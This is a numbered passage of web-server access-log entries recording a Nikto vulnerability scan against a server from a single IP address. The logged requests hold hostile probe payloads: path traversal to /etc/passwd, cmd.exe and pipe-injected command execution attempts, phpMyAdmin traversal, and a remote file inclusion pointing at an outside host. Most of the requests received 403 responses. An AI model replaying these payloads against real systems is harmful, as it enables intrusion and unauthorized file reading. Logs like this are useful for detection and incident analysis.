  692. 84.56.69.222 - - [23/Oct/2013:15:30:11 +0400] "GET /./ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000327)"
  693. 84.56.69.222 - - [23/Oct/2013:15:30:13 +0400] "GET /nsn/fdir.bas:ShowVolume HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000328)"
  694. 84.56.69.222 - - [23/Oct/2013:15:30:14 +0400] "GET /nsn/fdir.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000329)"
  695. 84.56.69.222 - - [23/Oct/2013:15:30:14 +0400] "GET /servlet/webacc?User.html=noexist HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000330)"
  696. 84.56.69.222 - - [23/Oct/2013:15:30:15 +0400] "GET /forum/admin/database/wwForum.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000331)"
  697. 84.56.69.222 - - [23/Oct/2013:15:30:15 +0400] "GET /webmail/blank.html HTTP/1.1" 302 283 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000332)"
  698. 84.56.69.222 - - [23/Oct/2013:15:30:16 +0400] "GET /jamdb/ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000333)"
  699. 84.56.69.222 - - [23/Oct/2013:15:30:16 +0400] "GET /cgi/cgiproc? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000334)"
  700. 84.56.69.222 - - [23/Oct/2013:15:30:17 +0400] "GET /webcgi/addbanner.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000335)"
  701. 84.56.69.222 - - [23/Oct/2013:15:30:17 +0400] "GET /scripts/addbanner.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000335)"
  702. 84.56.69.222 - - [23/Oct/2013:15:30:18 +0400] "GET /webcgi/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000336)"
  703. 84.56.69.222 - - [23/Oct/2013:15:30:18 +0400] "GET /scripts/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000336)"
  704. 84.56.69.222 - - [23/Oct/2013:15:30:19 +0400] "GET /webcgi/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000337)"
  705. 84.56.69.222 - - [23/Oct/2013:15:30:19 +0400] "GET /scripts/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000337)"
  706. 84.56.69.222 - - [23/Oct/2013:15:30:19 +0400] "GET /webcgi/shtml.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000338)"
  707. 84.56.69.222 - - [23/Oct/2013:15:30:20 +0400] "GET /scripts/shtml.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000338)"
  708. 84.56.69.222 - - [23/Oct/2013:15:30:20 +0400] "GET /admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000339)"
  709. 84.56.69.222 - - [23/Oct/2013:15:30:21 +0400] "GET /webcgi/aglimpse.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000340)"
  710. 84.56.69.222 - - [23/Oct/2013:15:30:22 +0400] "GET /scripts/aglimpse.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000340)"
  711. 84.56.69.222 - - [23/Oct/2013:15:30:24 +0400] "GET /webcgi/aglimpse HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000341)"
  712. 84.56.69.222 - - [23/Oct/2013:15:30:25 +0400] "GET /scripts/aglimpse HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000341)"
  713. 84.56.69.222 - - [23/Oct/2013:15:30:27 +0400] "GET /webcgi/architext_query.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000342)"
  714. 84.56.69.222 - - [23/Oct/2013:15:30:27 +0400] "GET /scripts/architext_query.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000342)"
  715. 84.56.69.222 - - [23/Oct/2013:15:30:27 +0400] "GET /webcgi/cgiemail-1.4/cgicso?query=AAA HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000343)"
  716. 84.56.69.222 - - [23/Oct/2013:15:30:28 +0400] "GET /scripts/cgiemail-1.4/cgicso?query=AAA HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000343)"
  717. 84.56.69.222 - - [23/Oct/2013:15:30:28 +0400] "GET /cgi-local/cgiemail-1.6/cgicso?query=AAA HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000344)"
  718. 84.56.69.222 - - [23/Oct/2013:15:30:28 +0400] "GET /servlet/SchedulerTransfer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000345)"
  719. 84.56.69.222 - - [23/Oct/2013:15:30:28 +0400] "GET /servlet/sunexamples.BBoardServlet HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000346)"
  720. 84.56.69.222 - - [23/Oct/2013:15:30:28 +0400] "GET /servlets/SchedulerTransfer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000347)"
  721. 84.56.69.222 - - [23/Oct/2013:15:30:29 +0400] "GET /webcgi/cmd.exe?/c+dir HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000348)"
  722. 84.56.69.222 - - [23/Oct/2013:15:30:29 +0400] "GET /scripts/cmd.exe?/c+dir HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000348)"
  723. 84.56.69.222 - - [23/Oct/2013:15:30:36 +0400] "GET /webcgi/cmd1.exe?/c+dir HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000349)"
  724. 84.56.69.222 - - [23/Oct/2013:15:30:36 +0400] "GET /scripts/cmd1.exe?/c+dir HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000349)"
  725. 84.56.69.222 - - [23/Oct/2013:15:30:36 +0400] "GET /webcgi/hello.bat?&dir+c:\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000350)"
  726. 84.56.69.222 - - [23/Oct/2013:15:30:37 +0400] "GET /scripts/hello.bat?&dir+c:\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000350)"
  727. 84.56.69.222 - - [23/Oct/2013:15:30:37 +0400] "GET /webcgi/post32.exe|dir%20c:\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000351)"
  728. 84.56.69.222 - - [23/Oct/2013:15:30:37 +0400] "GET /scripts/post32.exe|dir%20c:\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000351)"
  729. 84.56.69.222 - - [23/Oct/2013:15:30:37 +0400] "GET /perl/-e%20print%20Hello HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000352)"
  730. 84.56.69.222 - - [23/Oct/2013:15:30:38 +0400] "GET /admin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000353)"
  731. 84.56.69.222 - - [23/Oct/2013:15:30:39 +0400] "GET /interscan/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000354)"
  732. 84.56.69.222 - - [23/Oct/2013:15:30:39 +0400] "GET /vgn/legacy/save HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000355)"
  733. 84.56.69.222 - - [23/Oct/2013:15:30:40 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000356)"
  734. 84.56.69.222 - - [23/Oct/2013:15:30:40 +0400] "GET /IDSWebApp/IDSjsp/Login.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000357)"
  735. 84.56.69.222 - - [23/Oct/2013:15:30:40 +0400] "GET /quikstore.cfg HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000358)"
  736. 84.56.69.222 - - [23/Oct/2013:15:30:40 +0400] "GET /quikstore.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000359)"
  737. 84.56.69.222 - - [23/Oct/2013:15:30:40 +0400] "GET /securecontrolpanel/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000360)"
  738. 84.56.69.222 - - [23/Oct/2013:15:30:40 +0400] "GET /siteminder HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000361)"
  739. 84.56.69.222 - - [23/Oct/2013:15:30:40 +0400] "GET /webmail/ HTTP/1.1" 302 273 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000362)"
  740. 84.56.69.222 - - [23/Oct/2013:15:30:41 +0400] "GET /Xcelerate/LoginPage.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000363)"
  741. 84.56.69.222 - - [23/Oct/2013:15:30:41 +0400] "GET /_cti_pvt/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000364)"
  742. 84.56.69.222 - - [23/Oct/2013:15:30:41 +0400] "GET /smg_Smxcfg30.exe?vcc=3560121183d3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000365)"
  743. 84.56.69.222 - - [23/Oct/2013:15:30:41 +0400] "GET /examples/servlets/index.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000366)"
  744. 84.56.69.222 - - [23/Oct/2013:15:30:41 +0400] "GET /nsn/..%5Cutil/attrib.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000367)"
  745. 84.56.69.222 - - [23/Oct/2013:15:30:42 +0400] "GET /nsn/..%5Cutil/chkvol.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000368)"
  746. 84.56.69.222 - - [23/Oct/2013:15:30:53 +0400] "GET /nsn/..%5Cutil/copy.bas HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000369)"
  747. 84.56.69.222 - - [23/Oct/2013:15:31:05 +0400] "GET /nsn/..%5Cutil/del.bas HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000370)"
  748. 84.56.69.222 - - [23/Oct/2013:15:31:05 +0400] "GET /nsn/..%5Cutil/dir.bas HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000371)"
  749. 84.56.69.222 - - [23/Oct/2013:15:31:06 +0400] "GET /nsn/..%5Cutil/dsbrowse.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000372)"
  750. 84.56.69.222 - - [23/Oct/2013:15:31:07 +0400] "GET /nsn/..%5Cutil/glist.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000373)"
  751. 84.56.69.222 - - [23/Oct/2013:15:31:08 +0400] "GET /nsn/..%5Cutil/lancard.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000374)"
  752. 84.56.69.222 - - [23/Oct/2013:15:31:08 +0400] "GET /nsn/..%5Cutil/md.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000375)"
  753. 84.56.69.222 - - [23/Oct/2013:15:31:09 +0400] "GET /nsn/..%5Cutil/rd.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000376)"
  754. 84.56.69.222 - - [23/Oct/2013:15:31:09 +0400] "GET /nsn/..%5Cutil/ren.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000377)"
  755. 84.56.69.222 - - [23/Oct/2013:15:31:10 +0400] "GET /nsn/..%5Cutil/send.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000378)"
  756. 84.56.69.222 - - [23/Oct/2013:15:31:10 +0400] "GET /nsn/..%5Cutil/set.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000379)"
  757. 84.56.69.222 - - [23/Oct/2013:15:31:10 +0400] "GET /nsn/..%5Cutil/slist.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000380)"
  758. 84.56.69.222 - - [23/Oct/2013:15:31:11 +0400] "GET /nsn/..%5Cutil/type.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000381)"
  759. 84.56.69.222 - - [23/Oct/2013:15:31:11 +0400] "GET /nsn/..%5Cutil/userlist.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000382)"
  760. 84.56.69.222 - - [23/Oct/2013:15:31:11 +0400] "GET /nsn/..%5Cweb/env.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000383)"
  761. 84.56.69.222 - - [23/Oct/2013:15:31:11 +0400] "GET /nsn/..%5Cweb/fdir.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000384)"
  762. 84.56.69.222 - - [23/Oct/2013:15:31:12 +0400] "GET /nsn/..%5Cwebdemo/env.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000385)"
  763. 84.56.69.222 - - [23/Oct/2013:15:31:13 +0400] "GET /nsn/..%5Cwebdemo/fdir.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000386)"
  764. 84.56.69.222 - - [23/Oct/2013:15:31:13 +0400] "GET /wikihome/action/conflict.php?TemplateDir=http://cirt.net/rfiinc.txt? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000387)"
  765. 84.56.69.222 - - [23/Oct/2013:15:31:15 +0400] "GET /webcgi/archie HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000388)"
  766. 84.56.69.222 - - [23/Oct/2013:15:31:15 +0400] "GET /scripts/archie HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000388)"
  767. 84.56.69.222 - - [23/Oct/2013:15:31:15 +0400] "GET /webcgi/calendar.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000389)"
  768. 84.56.69.222 - - [23/Oct/2013:15:31:15 +0400] "GET /scripts/calendar.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000389)"
  769. 84.56.69.222 - - [23/Oct/2013:15:31:15 +0400] "GET /webcgi/calendar HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000390)"
  770. 84.56.69.222 - - [23/Oct/2013:15:31:16 +0400] "GET /scripts/calendar HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000390)"
  771. 84.56.69.222 - - [23/Oct/2013:15:31:17 +0400] "GET /webcgi/date HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000391)"
  772. 84.56.69.222 - - [23/Oct/2013:15:31:17 +0400] "GET /scripts/date HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000391)"
  773. 84.56.69.222 - - [23/Oct/2013:15:31:17 +0400] "GET /webcgi/fortune HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000392)"
  774. 84.56.69.222 - - [23/Oct/2013:15:31:18 +0400] "GET /scripts/fortune HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000392)"
  775. 84.56.69.222 - - [23/Oct/2013:15:31:18 +0400] "GET /webcgi/redirect HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000393)"
  776. 84.56.69.222 - - [23/Oct/2013:15:31:20 +0400] "GET /scripts/redirect HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000393)"
  777. 84.56.69.222 - - [23/Oct/2013:15:31:20 +0400] "GET /webcgi/uptime HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000394)"
  778. 84.56.69.222 - - [23/Oct/2013:15:31:20 +0400] "GET /scripts/uptime HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000394)"
  779. 84.56.69.222 - - [23/Oct/2013:15:31:20 +0400] "GET /webcgi/wais.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000395)"
  780. 84.56.69.222 - - [23/Oct/2013:15:31:20 +0400] "GET /scripts/wais.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000395)"
  781. 84.56.69.222 - - [23/Oct/2013:15:31:20 +0400] "GET // HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000396)"
  782. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /webtop/wdk/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000397)"
  783. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /SilverStream HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000398)"
  784. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /signon HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000399)"
  785. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /upd/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000400)"
  786. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /examples/jsp/source.jsp?? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000401)"
  787. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /lpt9 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000402)"
  788. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /cfcache.map HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000403)"
  789. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /cfdocs/cfcache.map HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000404)"
  790. 84.56.69.222 - - [23/Oct/2013:15:31:22 +0400] "GET /CVS/Entries HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000405)"
  791. 84.56.69.222 - - [23/Oct/2013:15:31:23 +0400] "GET /lpt9.xtp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000406)"
  792. 84.56.69.222 - - [23/Oct/2013:15:31:23 +0400] "GET /3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000408)"
  793. 84.56.69.222 - - [23/Oct/2013:15:31:23 +0400] "GET /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000408)"
  794. 84.56.69.222 - - [23/Oct/2013:15:31:25 +0400] "GET /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000408)"
  795. 84.56.69.222 - - [23/Oct/2013:15:31:25 +0400] "GET /phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000408)"
  796. 84.56.69.222 - - [23/Oct/2013:15:31:26 +0400] "GET /pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000408)"
  797. 84.56.69.222 - - [23/Oct/2013:15:31:26 +0400] "GET /asp/sqlqhit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000409)"
  798. 84.56.69.222 - - [23/Oct/2013:15:31:26 +0400] "GET /asp/SQLQHit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000410)"
  799. 84.56.69.222 - - [23/Oct/2013:15:31:27 +0400] "GET /iissamples/issamples/sqlqhit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000411)"
  800. 84.56.69.222 - - [23/Oct/2013:15:31:27 +0400] "GET /iissamples/issamples/SQLQHit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000412)"
  801. 84.56.69.222 - - [23/Oct/2013:15:31:27 +0400] "GET /ISSamples/sqlqhit.asp HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000413)"
  802. 84.56.69.222 - - [23/Oct/2013:15:31:28 +0400] "GET /ISSamples/SQLQHit.asp HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000414)"
  803. 84.56.69.222 - - [23/Oct/2013:15:31:28 +0400] "GET /junk.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000415)"
  804. 84.56.69.222 - - [23/Oct/2013:15:31:28 +0400] "GET /oc/Search/sqlqhit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000416)"
  805. 84.56.69.222 - - [23/Oct/2013:15:31:28 +0400] "GET /oc/Search/SQLQHit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000417)"
  806. 84.56.69.222 - - [23/Oct/2013:15:31:29 +0400] "GET /search/htx/sqlqhit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000418)"
  807. 84.56.69.222 - - [23/Oct/2013:15:31:29 +0400] "GET /search/htx/SQLQHit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000419)"
  808. 84.56.69.222 - - [23/Oct/2013:15:31:29 +0400] "GET /search/sqlqhit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000420)"
  809. 84.56.69.222 - - [23/Oct/2013:15:31:29 +0400] "GET /search/SQLQHit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000421)"
  810. 84.56.69.222 - - [23/Oct/2013:15:31:29 +0400] "GET /sqlqhit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000422)"
  811. 84.56.69.222 - - [23/Oct/2013:15:31:30 +0400] "GET /SQLQHit.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000423)"
  812. 84.56.69.222 - - [23/Oct/2013:15:31:30 +0400] "GET /webcgi/com5..........................................................................................................................................................................................................................box HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000424)"
  813. 84.56.69.222 - - [23/Oct/2013:15:31:31 +0400] "GET /scripts/com5..........................................................................................................................................................................................................................box HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000424)"
  814. 84.56.69.222 - - [23/Oct/2013:15:31:31 +0400] "GET /webcgi/com5.java HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000425)"
  815. 84.56.69.222 - - [23/Oct/2013:15:31:42 +0400] "GET /scripts/com5.java HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000425)"
  816. 84.56.69.222 - - [23/Oct/2013:15:31:42 +0400] "GET /webcgi/com5.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000426)"
  817. 84.56.69.222 - - [23/Oct/2013:15:31:42 +0400] "GET /scripts/com5.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000426)"
  818. 84.56.69.222 - - [23/Oct/2013:15:31:43 +0400] "GET /?Open HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000427)"
  819. 84.56.69.222 - - [23/Oct/2013:15:31:43 +0400] "GET /?OpenServer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000428)"
  820. 84.56.69.222 - - [23/Oct/2013:15:31:43 +0400] "GET /catalog.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000429)"
  821. 84.56.69.222 - - [23/Oct/2013:15:31:43 +0400] "GET /cersvr.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000430)"
  822. 84.56.69.222 - - [23/Oct/2013:15:31:45 +0400] "GET /cgi-bin/testing_whatever HTTP/1.1" 404 284 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000431)"
  823. 84.56.69.222 - - [23/Oct/2013:15:31:46 +0400] "GET /domlog.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000432)"
  824. 84.56.69.222 - - [23/Oct/2013:15:31:46 +0400] "GET /events4.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000433)"
  825. 84.56.69.222 - - [23/Oct/2013:15:31:56 +0400] "GET /log.nsf HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000434)"
